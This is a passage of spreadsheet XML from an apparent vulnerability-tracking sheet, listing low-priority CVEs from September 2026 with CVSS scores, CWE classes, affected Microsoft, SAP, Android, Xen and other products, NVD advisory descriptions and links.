r="N1499" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1499" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1499" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1499" s="5" t="inlineStr" /><c r="R1499" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1499" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Storage Port Driver allows an unauthorized attacker to disclose information with a physical attack.</t></is></c><c r="T1499" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69381</t></is></c></row><row r="1500"><c r="A1500" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1500" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1500" s="5" t="inlineStr"><is><t>CVE-2026-69548</t></is></c><c r="D1500" s="5" t="n"><v>4.6</v></c><c r="E1500" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1500" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1500" s="5" t="inlineStr" /><c r="H1500" s="5" t="n"><v>0.005</v></c><c r="I1500" s="5" t="inlineStr" /><c r="J1500" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K150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00" s="5" t="inlineStr" /><c r="M1500" s="5" t="inlineStr" /><c r="N1500" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1500" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1500" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1500" s="5" t="inlineStr" /><c r="R1500" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S1500" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows RNDIS allows an unauthorized attacker to disclose information with a physical attack.</t></is></c><c r="T1500" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69548</t></is></c></row><row r="1501"><c r="A1501" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1501" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1501" s="5" t="inlineStr"><is><t>CVE-2026-76959</t></is></c><c r="D1501" s="5" t="n"><v>4.6</v></c><c r="E1501" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1501" s="5" t="inlineStr"><is><t>cna@sap.com</t></is></c><c r="G1501" s="5" t="inlineStr" /><c r="H1501" s="5" t="n"><v>0.001</v></c><c r="I1501" s="5" t="inlineStr" /><c r="J1501" s="5" t="inlineStr"><is><t>sap</t></is></c><c r="K1501" s="5" t="inlineStr" /><c r="L1501" s="5" t="inlineStr" /><c r="M1501" s="5" t="inlineStr" /><c r="N1501" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1501" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1501" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1501" s="5" t="inlineStr" /><c r="R1501" s="5" t="inlineStr"><is><t>CWE-352</t></is></c><c r="S1501" s="5" t="inlineStr"><is><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is></c><c r="T1501" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76959</t></is></c></row><row r="1502"><c r="A1502" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1502" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1502" s="5" t="inlineStr"><is><t>CVE-2026-78452</t></is></c><c r="D1502" s="5" t="n"><v>4.6</v></c><c r="E1502" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1502" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1502" s="5" t="inlineStr" /><c r="H1502" s="5" t="n"><v>0.005</v></c><c r="I1502" s="5" t="inlineStr" /><c r="J1502" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1502" s="5" t="inlineStr"><is><t>microsoft:windows_10_1809, microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L1502" s="5" t="inlineStr" /><c r="M1502" s="5" t="inlineStr" /><c r="N1502" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1502" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1502" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1502" s="5" t="inlineStr" /><c r="R1502" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1502" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Windows SCSI Class System File allows an unauthorized attacker to disclose information with a physical attack.</t></is></c><c r="T1502" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78452</t></is></c></row><row r="1503"><c r="A1503" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1503" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1503" s="5" t="inlineStr"><is><t>CVE-2026-78508</t></is></c><c r="D1503" s="5" t="n"><v>4.6</v></c><c r="E1503" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1503" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1503" s="5" t="inlineStr" /><c r="H1503" s="5" t="n"><v>0.004</v></c><c r="I1503" s="5" t="inlineStr" /><c r="J1503" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1503"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03" s="5" t="inlineStr" /><c r="M1503" s="5" t="inlineStr" /><c r="N1503" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1503" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1503" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1503" s="5" t="inlineStr" /><c r="R1503" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1503" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows CD-ROM Driver allows an unauthorized attacker to disclose information with a physical attack.</t></is></c><c r="T1503" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78508</t></is></c></row><row r="1504"><c r="A1504" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1504" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1504" s="5" t="inlineStr"><is><t>CVE-2026-78971</t></is></c><c r="D1504" s="5" t="n"><v>4.6</v></c><c r="E1504" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1504" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1504" s="5" t="inlineStr" /><c r="H1504" s="5" t="n"><v>0.002</v></c><c r="I1504" s="5" t="inlineStr" /><c r="J1504" s="5" t="inlineStr" /><c r="K1504" s="5" t="inlineStr" /><c r="L1504" s="5" t="inlineStr" /><c r="M1504" s="5" t="inlineStr" /><c r="N1504" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1504" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1504" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q1504" s="5" t="inlineStr" /><c r="R1504" s="5" t="inlineStr"><is><t>CWE-94</t></is></c><c r="S1504" s="5" t="inlineStr"><is><t>In Halo &lt;= 2.25.4, the plugin management feature allows users to install/update malicious plugins, which could let attackers execute any command with Halo process permissions.</t></is></c><c r="T1504" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78971</t></is></c></row><row r="1505"><c r="A1505" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1505" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1505" s="5" t="inlineStr"><is><t>CVE-2026-0001</t></is></c><c r="D1505" s="5" t="n"><v>4.4</v></c><c r="E1505" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1505" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1505" s="5" t="inlineStr" /><c r="H1505" s="5" t="n"><v>0.002</v></c><c r="I1505" s="5" t="inlineStr" /><c r="J1505" s="5" t="inlineStr" /><c r="K1505" s="5" t="inlineStr" /><c r="L1505" s="5" t="inlineStr" /><c r="M1505" s="5" t="inlineStr" /><c r="N1505" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1505" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1505" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1505" s="5" t="inlineStr" /><c r="R1505" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S1505"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r41p0 through r49p5, from r50p0 through r51p0, from r54p1 through r54p2; Valhall GPU Kernel Driver: from r41p0 through r49p5, from r50p0 through r54p3, r55p0; Arm 5th Gen GPU Architecture Kernel Driver: from r41p0 through r49p5, from r50p0 through r54p3, r55p0.</t></is></c><c r="T1505" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-0001</t></is></c></row><row r="1506"><c r="A1506" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1506" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1506" s="5" t="inlineStr"><is><t>CVE-2026-69713</t></is></c><c r="D1506" s="5" t="n"><v>4.4</v></c><c r="E1506" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1506" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1506" s="5" t="inlineStr" /><c r="H1506" s="5" t="n"><v>0.003</v></c><c r="I1506" s="5" t="inlineStr" /><c r="J1506" s="5" t="inlineStr" /><c r="K1506" s="5" t="inlineStr" /><c r="L1506" s="5" t="inlineStr" /><c r="M1506" s="5" t="inlineStr" /><c r="N1506" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1506" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1506" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1506" s="5" t="inlineStr" /><c r="R1506" s="5" t="inlineStr" /><c r="S1506" s="5" t="inlineStr"><is><t>Dependency on vulnerable third-party component in Windows Secure Boot allows an authorized attacker to bypass a security feature locally.</t></is></c><c r="T1506" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69713</t></is></c></row><row r="1507"><c r="A1507" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1507" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1507" s="5" t="inlineStr"><is><t>CVE-2026-28627</t></is></c><c r="D1507" s="5" t="n"><v>4.3</v></c><c r="E1507" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1507" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1507" s="5" t="inlineStr" /><c r="H1507" s="5" t="n"><v>0.002</v></c><c r="I1507" s="5" t="inlineStr" /><c r="J1507" s="5" t="inlineStr" /><c r="K1507" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L1507" s="5" t="inlineStr" /><c r="M1507" s="5" t="inlineStr" /><c r="N1507" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1507" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1507" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1507" s="5" t="inlineStr" /><c r="R1507" s="5" t="inlineStr"><is><t>CWE-693</t></is></c><c r="S1507" s="5" t="inlineStr"><is><t>In btm_sec_encrypt_change of btm_sec.cc, there is a possible downgrade attack due to a logic error in the code. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T1507" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28627</t></is></c></row><row r="1508"><c r="A1508" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1508" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1508" s="5" t="inlineStr"><is><t>CVE-2026-45527</t></is></c><c r="D1508" s="5" t="n"><v>4.3</v></c><c r="E1508" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1508" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1508" s="5" t="inlineStr" /><c r="H1508" s="5" t="n"><v>0.003</v></c><c r="I1508" s="5" t="inlineStr" /><c r="J1508" s="5" t="inlineStr" /><c r="K1508" s="5" t="inlineStr" /><c r="L1508" s="5" t="inlineStr" /><c r="M1508" s="5" t="inlineStr" /><c r="N1508" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1508" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1508" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1508" s="5" t="inlineStr" /><c r="R1508" s="5" t="inlineStr"><is><t>CWE-190</t></is></c><c r="S1508" s="5" t="inlineStr"><is><t>In convertCleanApertureToRect of HeifCleanAperture.cpp, there is a possible way to cause a temporary denial of service due to an integer overflow. This could lead to remote denial of service with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T1508" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-45527</t></is></c></row><row r="1509"><c r="A1509" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1509" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1509" s="5" t="inlineStr"><is><t>CVE-2026-53638</t></is></c><c r="D1509" s="5" t="n"><v>4.3</v></c><c r="E1509" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1509" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G1509" s="5" t="inlineStr" /><c r="H1509" s="5" t="n"><v>0.002</v></c><c r="I1509" s="5" t="inlineStr" /><c r="J1509" s="5" t="inlineStr" /><c r="K1509" s="5" t="inlineStr" /><c r="L1509" s="5" t="inlineStr" /><c r="M1509" s="5" t="inlineStr" /><c r="N1509" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1509" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1509" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q1509" s="5" t="inlineStr" /><c r="R1509" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="S1509" s="5" t="inlineStr"><is><t>Sylius is an Open Source eCommerce Framework on Symfony. Starting in version 2.0.0 and prior to version 2.0.18, 2.1.15, and 2.2.6, an authorization bypass vulnerability exists in the shop account API. The `PATCH /api/v2/shop/account/orders/{tokenValue}/payments/{paymentId}` endpoint, used by an authenticated shop customer to change the payment method of an order that has been placed but not yet paid (state `STATE_NEW`), does not validate that the chosen payment method is enabled for the order's channel. The equivalent checkout endpoint (`PATCH /api/v2/shop/orders/{tokenValue}/payments/{paymentId}`) correctly rejects out-of-channel payment methods with `HTTP 422`; the account endpoint silently accepts them and returns `HTTP 200`. An authenticated customer can therefore assign any globally enabled payment method to their own placed order, including methods that the store operator has explicitly excluded from that channel. The issue is fixed in versions: 2.0.18, 2.1.15, 2.2.6 and above. As a workaround, decorate the `Sylius\Bundle\ApiBundle\Changer\PaymentMethodChangerInterface` service in the application.</t></is></c><c r="T1509" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-53638</t></is></c></row><row r="1510"><c r="A1510" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1510" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1510" s="5" t="inlineStr"><is><t>CVE-2026-73019</t></is></c><c r="D1510" s="5" t="n"><v>4.3</v></c><c r="E1510" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1510" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1510" s="5" t="inlineStr" /><c r="H1510" s="5" t="n"><v>0.007</v></c><c r="I1510" s="5" t="inlineStr" /><c r="J1510" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1510"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10" s="5" t="inlineStr" /><c r="M1510" s="5" t="inlineStr" /><c r="N1510" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1510" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1510" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1510" s="5" t="inlineStr" /><c r="R1510" s="5" t="inlineStr"><is><t>CWE-41</t></is></c><c r="S1510" s="5" t="inlineStr"><is><t>Improper resolution of path equivalence in Windows URL Moniker allows an unauthorized attacker to bypass a security feature over a network.</t></is></c><c r="T1510" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73019</t></is></c></row><row r="1511"><c r="A1511" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1511" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1511" s="5" t="inlineStr"><is><t>CVE-2026-76962</t></is></c><c r="D1511" s="5" t="n"><v>4.3</v></c><c r="E1511" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1511" s="5" t="inlineStr"><is><t>cna@sap.com</t></is></c><c r="G1511" s="5" t="inlineStr" /><c r="H1511" s="5" t="n"><v>0.002</v></c><c r="I1511" s="5" t="inlineStr" /><c r="J1511" s="5" t="inlineStr"><is><t>sap</t></is></c><c r="K1511" s="5" t="inlineStr" /><c r="L1511" s="5" t="inlineStr" /><c r="M1511" s="5" t="inlineStr" /><c r="N1511" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1511" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1511" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1511" s="5" t="inlineStr" /><c r="R1511" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S1511" s="5" t="inlineStr"><is><t>SAP S/4HANA (Manage Bank Chains app) does not perform sufficient authorization checks within certain affected functionality. An attacker with low privileges could send specially crafted requests to delete specific entries that should not be accessible to them. This results in a low impact on availability. There is no impact on confidentiality and integrity.</t></is></c><c r="T1511" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76962</t></is></c></row><row r="1512"><c r="A1512" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1512" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1512" s="5" t="inlineStr"><is><t>CVE-2026-76963</t></is></c><c r="D1512" s="5" t="n"><v>4.3</v></c><c r="E1512" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1512" s="5" t="inlineStr"><is><t>cna@sap.com</t></is></c><c r="G1512" s="5" t="inlineStr" /><c r="H1512" s="5" t="n"><v>0.002</v></c><c r="I1512" s="5" t="inlineStr" /><c r="J1512" s="5" t="inlineStr"><is><t>sap</t></is></c><c r="K1512" s="5" t="inlineStr" /><c r="L1512" s="5" t="inlineStr" /><c r="M1512" s="5" t="inlineStr" /><c r="N1512" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1512" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1512" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1512" s="5" t="inlineStr" /><c r="R1512" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S1512" s="5" t="inlineStr"><is><t>Due to a missing authorization check in Application Server ABAP of SAP NetWeaver and ABAP Platform, an authenticated attacker could gain unauthorized access to sensitive system configuration information. Successful exploitation could result in exposure of security relevant settings and internal system details, resulting in low impact on confidentiality while integrity and availability remain unaffected.</t></is></c><c r="T1512" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76963</t></is></c></row><row r="1513"><c r="A1513" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1513" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1513" s="5" t="inlineStr"><is><t>CVE-2026-76977</t></is></c><c r="D1513" s="5" t="n"><v>4.3</v></c><c r="E1513" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1513" s="5" t="inlineStr"><is><t>cna@sap.com</t></is></c><c r="G1513" s="5" t="inlineStr" /><c r="H1513" s="5" t="n"><v>0.002</v></c><c r="I1513" s="5" t="inlineStr" /><c r="J1513" s="5" t="inlineStr"><is><t>sap</t></is></c><c r="K1513" s="5" t="inlineStr" /><c r="L1513" s="5" t="inlineStr" /><c r="M1513" s="5" t="inlineStr" /><c r="N1513" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1513" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1513" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1513" s="5" t="inlineStr" /><c r="R1513" s="5" t="inlineStr"><is><t>CWE-1289</t></is></c><c r="S1513" s="5" t="inlineStr"><is><t>SAP UI5 does not sufficiently validate the parent frame's origin against the configured allowlist. An unauthenticated attacker could host a malicious page to bypass framing restrictions. If an authenticated victim visits the attacker's page and interacts with it, the attacker could trick the victim into performing unintended actions, resulting in a low impact on integrity. There is no impact on confidentiality and availability.</t></is></c><c r="T1513" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76977</t></is></c></row><row r="1514"><c r="A1514" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1514" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1514" s="5" t="inlineStr"><is><t>CVE-2026-78455</t></is></c><c r="D1514" s="5" t="n"><v>4.3</v></c><c r="E1514" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1514" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1514" s="5" t="inlineStr" /><c r="H1514" s="5" t="n"><v>0.005</v></c><c r="I1514" s="5" t="inlineStr" /><c r="J1514" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1514" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2016, microsoft:windows_server_2019</t></is></c><c r="L1514" s="5" t="inlineStr" /><c r="M1514" s="5" t="inlineStr" /><c r="N1514" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1514" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1514" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1514" s="5" t="inlineStr" /><c r="R1514" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1514" s="5" t="inlineStr"><is><t>Out-of-bounds read in Xbox allows an unauthorized attacker to disclose information with a physical attack.</t></is></c><c r="T1514" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78455</t></is></c></row><row r="1515"><c r="A1515" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1515" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1515" s="5" t="inlineStr"><is><t>CVE-2026-78516</t></is></c><c r="D1515" s="5" t="n"><v>4.3</v></c><c r="E1515" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1515" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1515" s="5" t="inlineStr" /><c r="H1515" s="5" t="n"><v>0.005</v></c><c r="I1515" s="5" t="inlineStr" /><c r="J1515" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1515" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2012, microsoft:windows_server_2016</t></is></c><c r="L1515" s="5" t="inlineStr" /><c r="M1515" s="5" t="inlineStr" /><c r="N1515" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1515" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1515" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1515" s="5" t="inlineStr" /><c r="R1515" s="5" t="inlineStr"><is><t>CWE-126</t></is></c><c r="S1515" s="5" t="inlineStr"><is><t>Buffer over-read in Windows Storage allows an unauthorized attacker to disclose information with a physical attack.</t></is></c><c r="T1515" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78516</t></is></c></row><row r="1516"><c r="A1516" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1516" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1516" s="5" t="inlineStr"><is><t>CVE-2026-79588</t></is></c><c r="D1516" s="5" t="n"><v>4.3</v></c><c r="E1516" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1516" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1516" s="5" t="inlineStr" /><c r="H1516" s="5" t="n"><v>0.001</v></c><c r="I1516" s="5" t="inlineStr" /><c r="J1516" s="5" t="inlineStr" /><c r="K1516" s="5" t="inlineStr" /><c r="L1516" s="5" t="inlineStr" /><c r="M1516" s="5" t="inlineStr" /><c r="N1516" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1516" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1516" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1516" s="5" t="inlineStr" /><c r="R1516" s="5" t="inlineStr"><is><t>CWE-319</t></is></c><c r="S1516" s="5" t="inlineStr"><is><t>U-speed WIFI4 N300 T1 Pro v1.0.0 is vulnerable to Cleartext transmission of administration credentials over HTTP.</t></is></c><c r="T1516" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79588</t></is></c></row><row r="1517"><c r="A1517" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1517" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1517" s="5" t="inlineStr"><is><t>CVE-2026-79603</t></is></c><c r="D1517" s="5" t="n"><v>4.3</v></c><c r="E1517" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1517" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1517" s="5" t="inlineStr" /><c r="H1517" s="5" t="n"><v>0.002</v></c><c r="I1517" s="5" t="inlineStr" /><c r="J1517" s="5" t="inlineStr" /><c r="K1517" s="5" t="inlineStr" /><c r="L1517" s="5" t="inlineStr" /><c r="M1517" s="5" t="inlineStr" /><c r="N1517" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1517" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1517" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1517" s="5" t="inlineStr" /><c r="R1517" s="5" t="inlineStr"><is><t>CWE-664</t></is></c><c r="S1517" s="5" t="inlineStr"><is><t>x86 PV guests can free memory pages while still keeping a stale TLB entry
pointing to them.  A TLB flush is only issued by Xen (if needed) when the
page is re-used.  Since it's possible for the page to be scrubbed ahead of
the TLB flush, there's a window where a PV guest can modify an already
scrubbed page.</t></is></c><c r="T1517" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79603</t></is></c></row><row r="1518"><c r="A1518" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1518" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1518" s="5" t="inlineStr"><is><t>CVE-2026-86736</t></is></c><c r="D1518" s="5" t="n"><v>4.3</v></c><c r="E1518" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1518" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1518" s="5" t="inlineStr" /><c r="H1518" s="5" t="n"><v>0.002</v></c><c r="I1518" s="5" t="inlineStr" /><c r="J1518" s="5" t="inlineStr" /><c r="K1518" s="5" t="inlineStr"><is><t>snipeitapp:snipe-it</t></is></c><c r="L1518" s="5" t="inlineStr" /><c r="M1518" s="5" t="inlineStr" /><c r="N1518" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1518" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1518" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1518" s="5" t="inlineStr" /><c r="R1518" s="5" t="inlineStr"><is><t>CWE-682</t></is></c><c r="S1518" s="5" t="inlineStr"><is><t>snipe-it before 8.7.0 contains an incorrect calculation vulnerability in checkout request handling that allows authenticated users to corrupt the assets.requests_counter through duplicate submissions and cancellations without active requests. Attackers can repeatedly call cancel endpoints without active requests to drive the counter negative, or submit duplicate checkout requests to inflate the counter, misrepresenting pending demand in the admin queue.</t></is></c><c r="T1518" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86736</t></is></c></row><row r="1519"><c r="A1519" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1519" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1519" s="5" t="inlineStr"><is><t>CVE-2026-86853</t></is></c><c r="D1519" s="5" t="n"><v>4.3</v></c><c r="E1519" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1519" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1519" s="5" t="inlineStr" /><c r="H1519" 